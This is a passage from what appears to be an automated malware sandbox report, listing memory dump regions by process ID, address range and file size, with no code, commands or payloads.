                                                                                                                                            Filesize

                                                                                                                                            572KB

                                                                                                                                          • memory/2328-202-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2328-204-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            152KB

                                                                                                                                          • memory/2328-205-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.5MB

                                                                                                                                          • memory/2328-206-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            100KB

                                                                                                                                          • memory/2328-144-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            572KB

                                                                                                                                          • memory/2328-145-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            572KB

                                                                                                                                          • memory/2328-146-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            572KB

                                                                                                                                          • memory/2328-157-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2328-156-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2328-155-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2328-154-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2328-153-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.1MB

                                                                                                                                          • memory/2328-147-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.5MB

                                                                                                                                          • memory/2328-151-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            152KB

                                                                                                                                          • memory/2328-150-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.5MB

                                                                                                                                          • memory/2328-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.5MB

                                                                                                                                          • memory/2328-148-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.5MB

                                                                                                                                          • memory/2488-220-0x0000000000CE0000-0x0000000000CF5000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            84KB

                                                                                                                                          • memory/2528-260-0x0000000000A30000-0x0000000000E6E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4.2MB

                                                                                                                                          • memory/2528-285-0x0000000005F50000-0x0000000005FA0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            320KB

                                                                                                                                          • memory/2528-275-0x0000000072BD0000-0x0000000073380000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/2528-273-0x0000000002F70000-0x0000000002F71000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2528-265-0x0000000000A30000-0x0000000000E6E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4.2MB

                                                                                                                                          • memory/3404-234-0x0000000072BD0000-0x0000000073380000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/3404-232-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/3404-235-0x0000000005720000-0x0000000005D38000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.1MB

                                                                                                                                          • memory/3440-262-0x0000000000738000-0x00000000007A4000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            432KB

                                                                                                                                          • memory/3612-196-0x00007FFC41140000-0x00007FFC41C01000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/3612-176-0x0000000000D00000-0x0000000000D30000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            192KB

                                                                                                                                          • memory/4356-217-0x0000000000400000-0x0000000002BF0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            39.9MB

                                                                                                                                          • memory/4356-212-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/4356-175-0x0000000002EF2000-0x0000000002EFB000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/4356-304-0x0000000000400000-0x0000000000629000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            2.2MB

                                                                                                                                          • memory/4356-211-0x0000000002EF2000-0x0000000002EFB000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/4384-287-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                          • memory/4384-293-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                          • memory/4384-289-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                          • memory/4788-271-0x0000000002160000-0x00000000021C0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            384KB

                                                                                                                                          • memory/4840-288-0x0000000000970000-0x00000000009AE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            248KB

                                                                                                                                          • memory/4948-179-0x0000000002DF2000-0x0000000002E56000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            400KB

                                                                                                                                          • memory/4948-215-0x0000000002DF2000-0x0000000002E56000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            400KB

                                                                                                                                          • memory/4948-216-0x0000000002C50000-0x0000000002CED000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            628KB

                                                                                                                                          • memory/4948-218-0x0000000000400000-0x0000000002C4B000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            40.3MB

                                                                                                                                          • memory/4972-208-0x00000000049E4000-0x00000000049E6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/4972-197-0x0000000007E40000-0x0000000008458000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.1MB

                                                                                                                                          • memory/4972-214-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            188KB

                                                                                                                                          • memory/4972-225-0x00000000049E2000-0x00000000049E3000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-226-0x00000000049E3000-0x00000000049E4000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-180-0x0000000002D62000-0x0000000002D83000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            132KB

                                                                                                                                          • memory/4972-200-0x0000000007820000-0x000000000785C000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            240KB

                                                                                                                                          • memory/4972-219-0x0000000000400000-0x0000000002C08000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            40.0MB

                                                                                                                                          • memory/4972-199-0x0000000004EF0000-0x0000000004F02000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            72KB

                                                                                                                                          • memory/4972-224-0x00000000049E0000-0x00000000049E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-191-0x0000000007270000-0x0000000007814000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            5.6MB

                                                                                                                                          • memory/4972-213-0x0000000002D62000-0x0000000002D83000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            132KB

                                                                                                                                          • memory/4972-223-0x0000000072BD0000-0x0000000073380000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            7.7MB

                                                                                                                                          • memory/4972-207-0x00000000079F0000-0x0000000007AFA000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.0MB

                                                                                                                                          • memory/5024-198-0x00007FFC41140000-0x00007FFC41C01000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            10.8MB

                                                                                                                                          • memory/5024-174-0x0000000000240000-0x0000000000272000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            200KB

                                                                                                                                          • memory/5100-316-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            13.3MB

                                                                                                                                          • memory/5104-210-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            436KB

                                                                                                                                          • memory/5104-183-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            436KB